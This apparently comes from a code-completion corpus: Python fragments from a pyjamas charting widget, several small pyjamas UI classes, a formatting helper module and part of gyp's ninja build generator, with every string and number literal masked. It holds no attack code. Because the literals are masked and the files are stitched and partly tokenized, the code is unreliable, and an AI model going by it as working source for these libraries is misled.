                cAnnotation.getSymbol().setBackgroundColor("<STR_LIT>")
                cAnnotation.getSymbol().setBorderColor(TRANSPARENT_BORDER_COLOR)
                if None != cTouched.getSymbol().getHoverAnnotationSymbolType():
                    cAnnotation.getSymbol().setSymbolType(
                        cTouched.getSymbol().getHoverAnnotationSymbolType())
                cAnnotation.getPoint(<NUM_LIT:0>).setAnnotationFontColor(
                    cTouched.getSymbol().getHoverFontColor())
                cAnnotation.getPoint(<NUM_LIT:0>).setAnnotationFontSize(
                    cTouched.getSymbol().getHoverFontSize())
                cAnnotation.getPoint(<NUM_LIT:0>).setAnnotationFontStyle(
                    cTouched.getSymbol().getHoverFontStyle())
                cAnnotation.getPoint(<NUM_LIT:0>).setAnnotationFontWeight(
                    cTouched.getSymbol().getHoverFontWeight())
                cAnnotation.getPoint(<NUM_LIT:0>).setAnnotationLocation(
                    cTouched.getSymbol().getHoverLocation())
                cAnnotation.getPoint(<NUM_LIT:0>).setAnnotationXShift(
                    cTouched.getSymbol().getHoverXShift())
                cAnnotation.getPoint(<NUM_LIT:0>).setAnnotationYShift(
                    cTouched.getSymbol().getHoverYShift())
            if not cTouched.getSymbol().getHoverSelectionEnabled():
                cCursor.setVisible(False)
            else:
                # Mirror the touched symbol's selection-feedback properties
                # onto the system cursor curve.
                cCursor.setVisible(True)
                cCursor.setYAxis(cTouched.getYAxis())
                cCursor.getPoint(<NUM_LIT:0>).setX(p.getX())
                cCursor.getPoint(<NUM_LIT:0>).setY(p.getY())
                cCursor.getSymbol().copy(cTouched.getSymbol())
                if None != cTouched.getSymbol().getHoverSelectionSymbolType():
                    cCursor.getSymbol().setSymbolType(
                        cTouched.getSymbol().getHoverSelectionSymbolType())
                fillSpacing = cTouched.getSymbol().getHoverSelectionFillSpacing()
                if not (Double.NaN == (fillSpacing)):
                    cCursor.getSymbol().setFillSpacing(fillSpacing)
                fillThickness = cTouched.getSymbol().getHoverSelectionFillThickness()
                if NAI != fillThickness:
                    cCursor.getSymbol().setFillThickness(fillThickness)
                if NAI != cTouched.getSymbol().getHoverSelectionHeight():
                    cCursor.getSymbol().setHeight(
                        cTouched.getSymbol().getHoverSelectionHeight())
                if NAI != cTouched.getSymbol().getHoverSelectionWidth():
                    cCursor.getSymbol().setWidth(
                        cTouched.getSymbol().getHoverSelectionWidth())
                cCursor.getSymbol().setImageURL(
                    cTouched.getSymbol().getHoverSelectionImageURL())
                cCursor.getSymbol().setBackgroundColor(
                    cTouched.getSymbol().getHoverSelectionBackgroundColor())
                cCursor.getSymbol().setBorderColor(
                    cTouched.getSymbol().getHoverSelectionBorderColor())
                cCursor.getSymbol().setBorderStyle(
                    cTouched.getSymbol().getHoverSelectionBorderStyle())
                borderWidth = cTouched.getSymbol().getHoverSelectionBorderWidth()
                cCursor.getSymbol().setBorderWidth(borderWidth)

    """<STR_LIT>"""
    def isContainedIn(self, container, et):
        # DOM-containment test: is element et inside container?
        if container is None:
            return False
        return DOM.isOrHasChild(et, container)
        # NOTE(review): everything below this return is unreachable dead
        # code (an older manual ancestor-walk implementation); it should be
        # deleted in a follow-up change.
        part = et
        """<STR_LIT>"""
        if None == part:
            return True
        try:
            ancestor = part
            while ancestor is not None and container is not None:
                if DOM.isSameNode(container, ancestor):
                    return True
                ancestor = ancestor.getParentElement()
        except:
            """<STR_LIT>"""
            return True
        return False

    """<STR_LIT>"""
    def isGeometricallyContainedIn(self, container, clientX, clientY):
        # Pixel-geometry fallback containment test for browsers whose DOM
        # containment answers are unreliable near element edges.
        if None == container:
            raise IllegalArgumentException("<STR_LIT>")
        result = False
        """<STR_LIT>"""
        y = Window.getScrollTop() + self.repairBadClientY(clientY)
        absTop = DOM.getAbsoluteTop(container)
        if absTop < y and y + <NUM_LIT:1> < absTop + DOM.getOffsetHeight(container):
            x = Window.getScrollLeft() + self.repairBadClientX(clientX)
            absLeft = DOM.getAbsoluteLeft(container)
            if absLeft < x and x + <NUM_LIT:1> < absLeft + DOM.getOffsetWidth(container):
                result = True
        return result

    def touchObjectAtMousePosition(self, retouch=False):
        # Touch whatever point the "brush" at the mouse position hits;
        # returns True when the touched point actually changed (or when a
        # retouch was forced), i.e. when the chart needs reassembly.
        result = False
        pointAtPosition = self.chart.getClosestBrushTouchingPointNoCheck(
            self.getXMousePlotArea(), self.getYMousePlotArea())
        if (pointAtPosition != self.touchedPoint) or retouch:
            self.touch(pointAtPosition)
            result = True
        return result

    def retouchObjectAtMousePosition(self):
        self.touchObjectAtMousePosition(True)

    """<STR_LIT>"""
    def isOverOpenedHoverAnnotation(self, event):
        # True when the event occurred over the opened hover popup, either
        # by DOM containment or by pixel geometry.
        result = False
        hoverElement = self.getOpenedHoverElement()
        if None != hoverElement:
            if self.isContainedIn(hoverElement, DOM.eventGetTarget(event)):
                result = True
            elif self.isGeometricallyContainedIn(hoverElement,
                                                 DOM.eventGetClientX(event),
                                                 DOM.eventGetClientY(event)):
                result = True
        return result

    """<STR_LIT>"""
    def takesUsCompletelyOutsideChart(self, event):
        # A mouseout only counts as "leaving the chart" when the destination
        # is outside the chart element AND outside any open hover popup.
        result = True
        if self.isContainedIn(self.getElement(), DOM.eventGetToElement(event)):
            """<STR_LIT>"""
            result = False
        elif self.isGeometricallyContainedIn(self.getElement(),
                                             DOM.eventGetClientX(event),
                                             DOM.eventGetClientY(event)):
            result = False
        else:
            hoverElement = self.getOpenedHoverElement()
            if None != hoverElement:
                if self.isGeometricallyContainedIn(hoverElement,
                                                   DOM.eventGetClientX(event),
                                                   DOM.eventGetClientY(event)):
                    result = False
        return result

    """<STR_LIT>"""
    def onBrowserEvent(self, event):
        AbsolutePanel.onBrowserEvent(self, event)
        """<STR_LIT>"""
        eventId = DOM.eventGetType(event)
        """<STR_LIT>"""
        isClick = ("<STR_LIT>" == eventId)
        if ("<STR_LIT>" == eventId or "<STR_LIT>" == eventId or isClick) and not self.isOverOpenedHoverAnnotation(event):
            """<STR_LIT>"""
            # Track the mouse and retouch; only reassemble the chart when a
            # touch change actually happened and no full update is pending.
            if self.chart.getHoverTouchingEnabled() or isClick:
                self.setClientX(DOM.eventGetClientX(event), isClick)
                self.setClientY(DOM.eventGetClientY(event), isClick)
                if (not self.chart.isUpdateNeeded() and
                    self.touchObjectAtMousePosition(isClick)):
                    self.chart.assembleChart()
        elif "<STR_LIT>" == eventId and self.chart.getHoverTouchingEnabled() and self.takesUsCompletelyOutsideChart(event):
            """<STR_LIT>"""
            # Mouse left the chart entirely: clear position and untouch.
            self.setClientX(NAI, False);
            self.setClientY(NAI, False);
            if (not self.chart.isUpdateNeeded() and
                self.touchObjectAtMousePosition()):
                self.chart.assembleChart()

    def isValidated(self):
        # True only when every curve on the chart has been validated.
        result = True
        i = <NUM_LIT:0>
        while result and i < len(self.chart.curves):
            result = self.chart.curves[i].isValidated()
            i += <NUM_LIT:1>
        return result

    """<STR_LIT>"""
    def getRenderingPanelCount(self):
        result = self.graphicsPanel.getWidgetCount()
        return result

    def getXChartSize(self):
        return self.xChartSize

    def getYChartSize(self):
        return self.yChartSize

    def getXChartSizeDecoratedQuickly(self):
        # Plot width plus both y-axis bands and the legend band.
        result = (self.xChartSize +
                  self.yAxisEnsembleWidth +
                  self.y2AxisEnsembleWidth +
                  self.chartLegendThickness)
        return result

    def getYChartSizeDecoratedQuickly(self):
        # Plot height plus x-axis band, title margin and footnotes band.
        result = (self.yChartSize +
                  self.xAxisEnsembleHeight +
                  self.topMargin +
                  self.chartFootnotesThickness)
        return result
"""<STR_LIT>"""
from pyjamas.media.Media import Media
from pyjamas import DOM

"""<STR_LIT>"""


class Audio(Media):
    """Media widget backed by a browser audio element."""

    def __init__(self, src=None, **kwargs):
        # Create and attach the DOM node first, so that setSrc() and the
        # Media base initialiser can operate on a live element.
        element = DOM.createElement("<STR_LIT>")
        self.setElement(element)
        if src:
            self.setSrc(src)
        Media.__init__(self, **kwargs)
from pyjamas import DOM
from pyjamas.ui import Event


def fireChangeEvent(listeners, sender, event):
    """Notify every registered listener that *sender* changed.

    Only fires for change-type browser events.  Each listener may be an
    object exposing an ``onChange`` method or a plain callable; either way
    it receives *sender* as its single argument.
    """
    if DOM.eventGetType(event) != "<STR_LIT>":
        return
    for entry in listeners:
        if hasattr(entry, '<STR_LIT>'):
            entry.onChange(sender)
        else:
            entry(sender)


class ChangeHandler(object):
    """Mixin wiring browser change events to a listener registry.

    Intended to be combined with a widget class that supplies
    ``sinkEvents`` and participates in browser event dispatch.
    """

    def __init__(self):
        self._changeListeners = []
        self.sinkEvents(Event.ONCHANGE)

    def onBrowserEvent(self, event):
        # Forward change events to the registered listeners; ignore others.
        if DOM.eventGetType(event) == '<STR_LIT>':
            fireChangeEvent(self._changeListeners, self, event)

    def addChangeListener(self, listener):
        self._changeListeners.append(listener)

    def removeChangeListener(self, listener):
        self._changeListeners.remove(listener)

    def onChange(self, sender):
        # Default no-op hook; subclasses override to react to changes.
        pass
<s> """<STR_LIT>""" <EOL> from pyjamas . ui . SplitPanel import SplitPanel <EOL> from pyjamas import Factory <EOL> class HorizontalSplitPanel ( SplitPanel ) : <EOL> def __init__ ( self , ** kwargs ) : <EOL> SplitPanel . __init__ ( self , vertical = False , ** kwargs ) <EOL> def setLeftWidget ( self , leftWidget ) : <EOL> self . setWidget ( <NUM_LIT:0> , leftWidget ) <EOL> def getLeftWidget ( self ) : <EOL> return self . getWidget ( <NUM_LIT:0> ) <EOL> def setRightWidget ( self , rightWidget ) : <EOL> self . setWidget ( <NUM_LIT:1> , rightWidget ) <EOL> def getRightWidget ( self ) : <EOL> return self . getWidget ( <NUM_LIT:1> ) <EOL> Factory . registerClass ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> HorizontalSplitPanel ) </s>
class TextArea:
    # Browser-backend stub: the actual implementation is the inline
    # JavaScript handed to JS(); nothing executes on the Python side.
    def getCursorPos(self):
        # Presumably returns the caret position of the underlying textarea
        # element -- TODO confirm against the (masked) JS body.
        JS("""<STR_LIT>""")
import DOM


class UIObject:
    """Minimal wrapper pairing a widget with its DOM element."""

    def getElement(self):
        return self.element

    def setElement(self, element):
        self.element = element

    def setStyleName(self, style):
        # The CSS class attribute name is stored in the masked literal.
        DOM.setAttribute(self.element, "<STR_LIT>", style)


class Widget(UIObject):
    """A UIObject that additionally tracks its parent panel."""

    def setParent(self, parent):
        self.parent = parent


class Panel(Widget):
    pass


class ComplexPanel(Panel):
    """Panel keeping an ordered list of child widgets."""

    def __init__(self):
        self.children = []

    def add(self, widget):
        self.children.append(widget)
        widget.setParent(self)
        return True


class AbsolutePanel(ComplexPanel):
    """Panel rendered as a positioned div; children attach to its element."""

    def __init__(self):
        ComplexPanel.__init__(self)
        self.setElement(DOM.createDiv())
        DOM.setStyleAttribute(self.getElement(), "<STR_LIT>", "<STR_LIT>")

    def add(self, widget):
        # Record the child logically, then attach its DOM node to ours.
        ComplexPanel.add(self, widget)
        DOM.appendChild(self.getElement(), widget.getElement())
        return True


class RootPanel(AbsolutePanel):
    """The panel bound to the document body."""

    def __init__(self):
        AbsolutePanel.__init__(self)
        # Re-point this panel at the document body, replacing the div
        # created by AbsolutePanel.__init__.
        body = self.getBodyElement()
        self.setElement(body)

    def getBodyElement(self):
        JS("""<STR_LIT>""")
<s> """<STR_LIT>""" <EOL> def safe_repr ( obj , clip = None ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> s = repr ( obj ) <EOL> if not clip or len ( s ) <= clip : <EOL> return s <EOL> else : <EOL> return s [ : clip - <NUM_LIT:4> ] + '<STR_LIT:..>' + s [ - <NUM_LIT:2> : ] <EOL> except : <EOL> return '<STR_LIT>' <EOL> def trunc ( obj , max , left = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> s = str ( obj ) <EOL> s = s . replace ( '<STR_LIT:\n>' , '<STR_LIT:|>' ) <EOL> if len ( s ) > max : <EOL> if left : <EOL> return '<STR_LIT>' + s [ len ( s ) - max + <NUM_LIT:3> : ] <EOL> else : <EOL> return s [ : ( max - <NUM_LIT:3> ) ] + '<STR_LIT>' <EOL> else : <EOL> return s <EOL> def pp ( i , base = <NUM_LIT> ) : <EOL> """<STR_LIT>""" <EOL> degree = <NUM_LIT:0> <EOL> pattern = "<STR_LIT>" <EOL> while i > base : <EOL> pattern = "<STR_LIT>" <EOL> i = i / float ( base ) <EOL> degree += <NUM_LIT:1> <EOL> scales = [ '<STR_LIT:B>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> return pattern % ( i , scales [ degree ] ) <EOL> def pp_timestamp ( t ) : <EOL> """<STR_LIT>""" <EOL> if t is None : <EOL> return '<STR_LIT>' <EOL> h , m , s = int ( t / <NUM_LIT> ) , int ( t / <NUM_LIT> % <NUM_LIT> ) , t % <NUM_LIT> <EOL> return "<STR_LIT>" % ( h , m , s ) </s>
from __future__ import print_function
import collections
import copy
import hashlib
import json
import multiprocessing
import os.path
import re
import signal
import subprocess
import sys
import gyp
import gyp.common
from gyp.common import OrderedSet
import gyp.msvs_emulation
import gyp.MSVSUtil as MSVSUtil
import gyp.xcode_emulation
import os

# Pick the StringIO implementation matching the running interpreter.
_PYTHON3 = sys.version_info >= (<NUM_LIT:3>, <NUM_LIT:0>, <NUM_LIT:0>)
if _PYTHON3:
    from io import StringIO
else:
    from cStringIO import StringIO
from gyp.common import GetEnvironFallback
import gyp.ninja_syntax as ninja_syntax

# Placeholder -> expansion map consumed by the gyp input processor.
generator_default_variables = {
    '<STR_LIT>': '<STR_LIT>',
    '<STR_LIT>': '<STR_LIT>',
    '<STR_LIT>': '<STR_LIT>',
    '<STR_LIT>': '<STR_LIT>',
    '<STR_LIT>': '<STR_LIT>',
    '<STR_LIT>': '<STR_LIT>',
    '<STR_LIT>': '<STR_LIT>',
    '<STR_LIT>': '<STR_LIT>',
    '<STR_LIT>': '<STR_LIT>',
    '<STR_LIT>': '<STR_LIT>',
    '<STR_LIT>': '<STR_LIT>',
    '<STR_LIT>': '<STR_LIT>',
    '<STR_LIT>': '<STR_LIT>',
    '<STR_LIT>': '<STR_LIT>',
}
generator_additional_non_configuration_keys = []
generator_additional_path_sections = []
generator_extra_sources_for_rules = []
generator_filelist_paths = None
# Multiple toolsets are enabled when any of these (masked) environment
# variables is set.
generator_supports_multiple_toolsets = (
    os.environ.get('<STR_LIT>') or
    os.environ.get('<STR_LIT>') or
    os.environ.get('<STR_LIT>') or
    os.environ.get('<STR_LIT>') or
    os.environ.get('<STR_LIT>') or
    os.environ.get('<STR_LIT>') or
    os.environ.get('<STR_LIT>'))


def StripPrefix(arg, prefix):
    # Remove prefix from arg if present; otherwise return arg unchanged.
    if arg.startswith(prefix):
        return arg[len(prefix):]
    return arg


def QuoteShellArgument(arg, flavor):
    """<STR_LIT>"""
    # Fast path: arguments matching the safe pattern need no quoting.
    if re.match(r'<STR_LIT>', arg):
        return arg
    if flavor == '<STR_LIT>':
        return gyp.msvs_emulation.QuoteForRspFile(arg)
    # POSIX single-quote, escaping embedded single quotes.
    return "<STR_LIT:'>" + arg.replace("<STR_LIT:'>", "<STR_LIT:'>" + '<STR_LIT>' + "<STR_LIT:'>") + "<STR_LIT:'>"


def Define(d, flavor):
    """<STR_LIT>"""
    if flavor == '<STR_LIT>':
        # Escape characters the Windows shell would otherwise mangle.
        d = d.replace('<STR_LIT:#>', '<STR_LIT>' % ord('<STR_LIT:#>'))
    return QuoteShellArgument(ninja_syntax.escape('<STR_LIT>' + d), flavor)


def AddArch(output, arch):
    """<STR_LIT>"""
    # Insert the architecture name between the basename and the extension.
    output, extension = os.path.splitext(output)
    return '<STR_LIT>' % (output, arch, extension)


class Target(object):
    """<STR_LIT>"""
    # Bookkeeping for one gyp target's build stages and outputs.
    def __init__(self, type):
        self.type = type
        self.preaction_stamp = None
        self.precompile_stamp = None
        self.actions_stamp = None
        self.binary = None
        self.bundle = None
        self.component_objs = None
        self.import_lib = None

    def Linkable(self):
        """<STR_LIT>"""
        return self.type in ('<STR_LIT>', '<STR_LIT>')

    def UsesToc(self, flavor):
        """<STR_LIT>"""
        if flavor == '<STR_LIT>' or self.bundle:
            return False
        return self.type in ('<STR_LIT>', '<STR_LIT>')

    def PreActionInput(self, flavor):
        """<STR_LIT>"""
        if self.UsesToc(flavor):
            return self.FinalOutput() + '<STR_LIT>'
        return self.FinalOutput() or self.preaction_stamp

    def PreCompileInput(self):
        """<STR_LIT>"""
        return self.actions_stamp or self.precompile_stamp

    def FinalOutput(self):
        """<STR_LIT>"""
        # Preference order: bundle, then binary, then the actions stamp.
        return self.bundle or self.binary or self.actions_stamp


class NinjaWriter(object):
    # Emits one .ninja file for a single gyp target.
    def __init__(self, hash_for_rules, target_outputs, base_dir, build_dir,
                 output_file, toplevel_build, output_file_name, flavor,
                 toplevel_dir=None):
        """<STR_LIT>"""
        self.hash_for_rules = hash_for_rules
        self.target_outputs = target_outputs
        self.base_dir = base_dir
        self.build_dir = build_dir
        self.ninja = ninja_syntax.Writer(output_file)
        self.toplevel_build = toplevel_build
        self.output_file_name = output_file_name
        self.flavor = flavor
        self.abs_build_dir = None
        if toplevel_dir is not None:
            self.abs_build_dir = os.path.abspath(os.path.join(toplevel_dir,
                                                              build_dir))
        self.obj_ext = '<STR_LIT>' if flavor == '<STR_LIT>' else '<STR_LIT>'
        if flavor == '<STR_LIT>':
            # Per-architecture environment file names for Windows builds.
            self.win_env = {}
            for arch in ('<STR_LIT>', '<STR_LIT>'):
                self.win_env[arch] = '<STR_LIT>' + arch
        # Relative paths between the build dir and the target's source dir.
        build_to_top = gyp.common.InvertRelativePath(build_dir, toplevel_dir)
        self.build_to_base = os.path.join(build_to_top, base_dir)
        base_to_top = gyp.common.InvertRelativePath(base_dir, toplevel_dir)
        self.base_to_build = os.path.join(base_to_top, build_dir)

    def ExpandSpecial(self, path, product_dir=None):
        """<STR_LIT>"""
        # Expand the PRODUCT_DIR / INTERMEDIATE_DIR / CONFIGURATION_NAME
        # placeholders (all masked literals here).
        PRODUCT_DIR = '<STR_LIT>'
        if PRODUCT_DIR in path:
            if product_dir:
                path = path.replace(PRODUCT_DIR, product_dir)
            else:
                # No product dir: strip the placeholder (with either path
                # separator) or replace a bare occurrence with ".".
                path = path.replace(PRODUCT_DIR + '<STR_LIT:/>', '<STR_LIT>')
                path = path.replace(PRODUCT_DIR + '<STR_LIT:\\>', '<STR_LIT>')
                path = path.replace(PRODUCT_DIR, '<STR_LIT:.>')
        INTERMEDIATE_DIR = '<STR_LIT>'
        if INTERMEDIATE_DIR in path:
            int_dir = self.GypPathToUniqueOutput('<STR_LIT>')
            path = path.replace(INTERMEDIATE_DIR,
                                os.path.join(product_dir or '<STR_LIT>', int_dir))
        CONFIGURATION_NAME = '<STR_LIT>'
        path = path.replace(CONFIGURATION_NAME, self.config_name)
        return path

    def ExpandRuleVariables(self, path, root, dirname, source, ext, name):
        # Substitute per-rule placeholders (RULE_INPUT_*) into path.
        if self.flavor == '<STR_LIT>':
            path = self.msvs_settings.ConvertVSMacros(
                path, config=self.config_name)
        path = path.replace(generator_default_variables['<STR_LIT>'], root)
        path = path.replace(generator_default_variables['<STR_LIT>'],
                            dirname)
        path = path.replace(generator_default_variables['<STR_LIT>'], source)
        path = path.replace(generator_default_variables['<STR_LIT>'], ext)
        path = path.replace(generator_default_variables['<STR_LIT>'], name)
        return path

    def GypPathToNinja(self, path, env=None):
        """<STR_LIT>"""
        if env:
            if self.flavor == '<STR_LIT>':
                path = gyp.xcode_emulation.ExpandEnvVars(path, env)
            elif self.flavor == '<STR_LIT>':
                path = gyp.msvs_emulation.ExpandMacros(path, env)
        if path.startswith('<STR_LIT>'):
            # Already expressed relative to the build directory.
            expanded = self.ExpandSpecial(path)
            if self.flavor == '<STR_LIT>':
                expanded = os.path.normpath(expanded)
            return expanded
        if '<STR_LIT>' in path:
            path = self.ExpandSpecial(path)
        assert '<STR_LIT:$>' not in path, path
        return os.path.normpath(os.path.join(self.build_to_base, path))

    def GypPathToUniqueOutput(self, path, qualified=True):
        """<STR_LIT>"""
        path = self.ExpandSpecial(path)
        assert not path.startswith('<STR_LIT:$>'), path
        obj = '<STR_LIT>'
        if self.toolset != '<STR_LIT:target>':
            obj += '<STR_LIT:.>' + self.toolset
        path_dir, path_basename = os.path.split(path)
        if qualified:
            # Prefix with the target name so outputs from different targets
            # cannot collide.
            path_basename = self.name + '<STR_LIT:.>' + path_basename
        base_dir = self.base_dir.split(os.sep)
        # Collapse leading ".." components of the base dir.
        i = next(i for i, x in enumerate(base_dir) if x != '<STR_LIT:..>')
        base_dir = ('<STR_LIT:..>' * i) + os.sep.join(base_dir[i:])
        return os.path.normpath(os.path.join(obj, base_dir, path_dir,
                                             path_basename))

    def WriteCollapsedDependencies(self, name, targets, order_only=None):
        """<STR_LIT>"""
        assert targets == list(filter(None, targets)), targets
        if len(targets) == <NUM_LIT:0>:
            assert not order_only
            return None
        if len(targets) > <NUM_LIT:1> or order_only:
            # Collapse many dependencies into a single stamp file.
            stamp = self.GypPathToUniqueOutput(name + '<STR_LIT>')
            targets = self.ninja.build(stamp, '<STR_LIT>', targets,
                                       order_only=order_only)
            self.ninja.newline()
        return targets[<NUM_LIT:0>]

    def _SubninjaNameForArch(self, arch):
        # Per-architecture subninja file name derived from this writer's
        # output file name.
        output_file_base = os.path.splitext(self.output_file_name)[<NUM_LIT:0>]
        return '<STR_LIT>' % (output_file_base, arch)

    def WriteSpec(self, spec, config_name, generator_flags):
        """<STR_LIT>"""
        # NOTE: this method continues past the end of the visible chunk.
        self.config_name = config_name
        self.name = spec['<STR_LIT>']
        self.toolset = spec['<STR_LIT>']
        config = spec['<STR_LIT>'][config_name]
        self.target = Target(spec['<STR_LIT:type>'])
        self.is_standalone_static_library = bool(
            spec.get('<STR_LIT>', <NUM_LIT:0>))
        self.uses_cpp = False
        self.is_mac_bundle = gyp.xcode_emulation.IsMacBundle(self.flavor, spec)
        self.xcode_settings = self.msvs_settings = None
        if self.flavor == '<STR_LIT>':
            self.xcode_settings = gyp.xcode_emulation.XcodeSettings(spec)
        if self.flavor == '<STR_LIT>':
            self.msvs_settings = gyp.msvs_emulation.MsvsSettings(spec,
                                                                 generator_flags)
            arch = self.msvs_settings.
GetArch ( config_name ) <EOL> self . ninja . variable ( '<STR_LIT>' , self . win_env [ arch ] ) <EOL> self . ninja . variable ( '<STR_LIT>' , '<STR_LIT>' + arch ) <EOL> self . ninja . variable ( '<STR_LIT>' , '<STR_LIT>' + arch ) <EOL> self . ninja . variable ( '<STR_LIT>' , '<STR_LIT>' + arch ) <EOL> self . ninja . variable ( '<STR_LIT>' , '<STR_LIT>' + arch ) <EOL> if self . flavor == '<STR_LIT>' : <EOL> self . archs = self . xcode_settings . GetActiveArchs ( config_name ) <EOL> if len ( self . archs ) > <NUM_LIT:1> : <EOL> self . arch_subninjas = dict ( <EOL> ( arch , ninja_syntax . Writer ( <EOL> OpenOutput ( os . path . join ( self . toplevel_build , <EOL> self . _SubninjaNameForArch ( arch ) ) , <EOL> '<STR_LIT:w>' ) ) ) <EOL> for arch in self . archs ) <EOL> actions_depends = [ ] <EOL> compile_depends = [ ] <EOL> if '<STR_LIT>' in spec : <EOL> for dep in spec [ '<STR_LIT>' ] : <EOL> if dep in self . target_outputs : <EOL> target = self . target_outputs [ dep ] <EOL> actions_depends . append ( target . PreActionInput ( self . flavor ) ) <EOL> compile_depends . append ( target . PreCompileInput ( ) ) <EOL> actions_depends = list ( filter ( None , actions_depends ) ) <EOL> compile_depends = list ( filter ( None , compile_depends ) ) <EOL> actions_depends = self . WriteCollapsedDependencies ( '<STR_LIT>' , <EOL> actions_depends ) <EOL> compile_depends = self . WriteCollapsedDependencies ( '<STR_LIT>' , <EOL> compile_depends ) <EOL> self . target . preaction_stamp = actions_depends <EOL> self . target . precompile_stamp = compile_depends <EOL> extra_sources = [ ] <EOL> mac_bundle_depends = [ ] <EOL> self . target . actions_stamp = self . WriteActionsRulesCopies ( <EOL> spec , extra_sources , actions_depends , mac_bundle_depends ) <EOL> compile_depends_stamp = ( self . target . actions_stamp or compile_depends ) <EOL> link_deps = [ ] <EOL> sources = extra_sources + spec . get ( '<STR_LIT>' , [ ] ) <EOL> if sources : <EOL> if self . 
flavor == '<STR_LIT>' and len ( self . archs ) > <NUM_LIT:1> : <EOL> for arch in self . archs : <EOL> self . ninja . subninja ( self . _SubninjaNameForArch ( arch ) ) <EOL> pch = None <EOL> if self . flavor == '<STR_LIT>' : <EOL> gyp . msvs_emulation . VerifyMissingSources ( <EOL> sources , self . abs_build_dir , generator_flags , self . GypPathToNinja ) <EOL> pch = gyp . msvs_emulation . PrecompiledHeader ( <EOL> self . msvs_settings , config_name , self . GypPathToNinja , <EOL> self . GypPathToUniqueOutput , self . obj_ext ) <EOL> else : <EOL> pch = gyp . xcode_emulation . MacPrefixHeader ( <EOL> self . xcode_settings , self . GypPathToNinja , <EOL> lambda path , lang : self . GypPathToUniqueOutput ( path + '<STR_LIT:->' + lang ) ) <EOL> link_deps = self . WriteSources ( <EOL> self . ninja , config_name , config , sources , compile_depends_stamp , pch , <EOL> spec ) <EOL> obj_outputs = [ f for f in sources if f . endswith ( self . obj_ext ) ] <EOL> if obj_outputs : <EOL> if self . flavor != '<STR_LIT>' or len ( self . archs ) == <NUM_LIT:1> : <EOL> link_deps += [ self . GypPathToNinja ( o ) for o in obj_outputs ] <EOL> else : <EOL> print ( "<STR_LIT>" <EOL> "<STR_LIT>" % spec [ '<STR_LIT>' ] , <EOL> file = sys . stderr ) <EOL> elif self . flavor == '<STR_LIT>' and len ( self . archs ) > <NUM_LIT:1> : <EOL> link_deps = collections . defaultdict ( list ) <EOL> if self . flavor == '<STR_LIT>' and self . target . type == '<STR_LIT>' : <EOL> self . target . component_objs = link_deps <EOL> output = None <EOL> is_empty_bundle = not link_deps and not mac_bundle_depends <EOL> if link_deps or self . target . actions_stamp or actions_depends : <EOL> output = self . WriteTarget ( spec , config_name , config , link_deps , <EOL> self . target . actions_stamp or actions_depends ) <EOL> if self . is_mac_bundle : <EOL> mac_bundle_depends . append ( output ) <EOL> if self . is_mac_bundle : <EOL> output = self . 
WriteMacBundle ( spec , mac_bundle_depends , is_empty_bundle ) <EOL> if not output : <EOL> return None <EOL> assert self . target . FinalOutput ( ) , output <EOL> return self . target <EOL> def _WinIdlRule ( self , source , prebuild , outputs ) : <EOL> """<STR_LIT>""" <EOL> outdir , output , vars , flags = self . msvs_settings . GetIdlBuildData ( <EOL> source , self . config_name ) <EOL> outdir = self . GypPathToNinja ( outdir ) <EOL> def fix_path ( path , rel = None ) : <EOL> path = os . path . join ( outdir , path ) <EOL> dirname , basename = os . path . split ( source ) <EOL> root , ext = os . path . splitext ( basename ) <EOL> path = self . ExpandRuleVariables ( <EOL> path , root , dirname , source , ext , basename ) <EOL> if rel : <EOL> path = os . path . relpath ( path , rel ) <EOL> return path <EOL> vars = [ ( name , fix_path ( value , outdir ) ) for name , value in vars ] <EOL> output = [ fix_path ( p ) for p in output ] <EOL> vars . append ( ( '<STR_LIT>' , outdir ) ) <EOL> vars . append ( ( '<STR_LIT>' , flags ) ) <EOL> input = self . GypPathToNinja ( source ) <EOL> self . ninja . build ( output , '<STR_LIT>' , input , <EOL> variables = vars , order_only = prebuild ) <EOL> outputs . extend ( output ) <EOL> def WriteWinIdlFiles ( self , spec , prebuild ) : <EOL> """<STR_LIT>""" <EOL> assert self . flavor == '<STR_LIT>' <EOL> if self . msvs_settings . HasExplicitIdlRulesOrActions ( spec ) : <EOL> return [ ] <EOL> outputs = [ ] <EOL> for source in filter ( lambda x : x . endswith ( '<STR_LIT>' ) , spec [ '<STR_LIT>' ] ) : <EOL> self . _WinIdlRule ( source , prebuild , outputs ) <EOL> return outputs <EOL> def WriteActionsRulesCopies ( self , spec , extra_sources , prebuild , <EOL> mac_bundle_depends ) : <EOL> """<STR_LIT>""" <EOL> outputs = [ ] <EOL> if self . is_mac_bundle : <EOL> mac_bundle_resources = spec . 
get ( '<STR_LIT>' , [ ] ) [ : ] <EOL> else : <EOL> mac_bundle_resources = [ ] <EOL> extra_mac_bundle_resources = [ ] <EOL> if '<STR_LIT>' in spec : <EOL> outputs += self . WriteActions ( spec [ '<STR_LIT>' ] , extra_sources , prebuild , <EOL> extra_mac_bundle_resources ) <EOL> if '<STR_LIT>' in spec : <EOL> outputs += self . WriteRules ( spec [ '<STR_LIT>' ] , extra_sources , prebuild , <EOL> mac_bundle_resources , <EOL> extra_mac_bundle_resources ) <EOL> if '<STR_LIT>' in spec : <EOL> outputs += self . WriteCopies ( spec [ '<STR_LIT>' ] , prebuild , mac_bundle_depends ) <EOL> if '<STR_LIT>' in spec and self . flavor == '<STR_LIT>' : <EOL> outputs += self . WriteWinIdlFiles ( spec , prebuild ) <EOL> stamp = self . WriteCollapsedDependencies ( '<STR_LIT>' , outputs ) <EOL> if self . is_mac_bundle : <EOL> xcassets = self . WriteMacBundleResources ( <EOL> extra_mac_bundle_resources + mac_bundle_resources , mac_bundle_depends ) <EOL> partial_info_plist = self . WriteMacXCassets ( xcassets , mac_bundle_depends ) <EOL> self . WriteMacInfoPlist ( partial_info_plist , mac_bundle_depends ) <EOL> return stamp <EOL> def GenerateDescription ( self , verb , message , fallback ) : <EOL> """<STR_LIT>""" <EOL> if self . toolset != '<STR_LIT:target>' : <EOL> verb += '<STR_LIT>' % self . toolset <EOL> if message : <EOL> return '<STR_LIT>' % ( verb , self . ExpandSpecial ( message ) ) <EOL> else : <EOL> return '<STR_LIT>' % ( verb , self . name , fallback ) <EOL> def WriteActions ( self , actions , extra_sources , prebuild , <EOL> extra_mac_bundle_resources ) : <EOL> env = self . GetToolchainEnv ( ) <EOL> 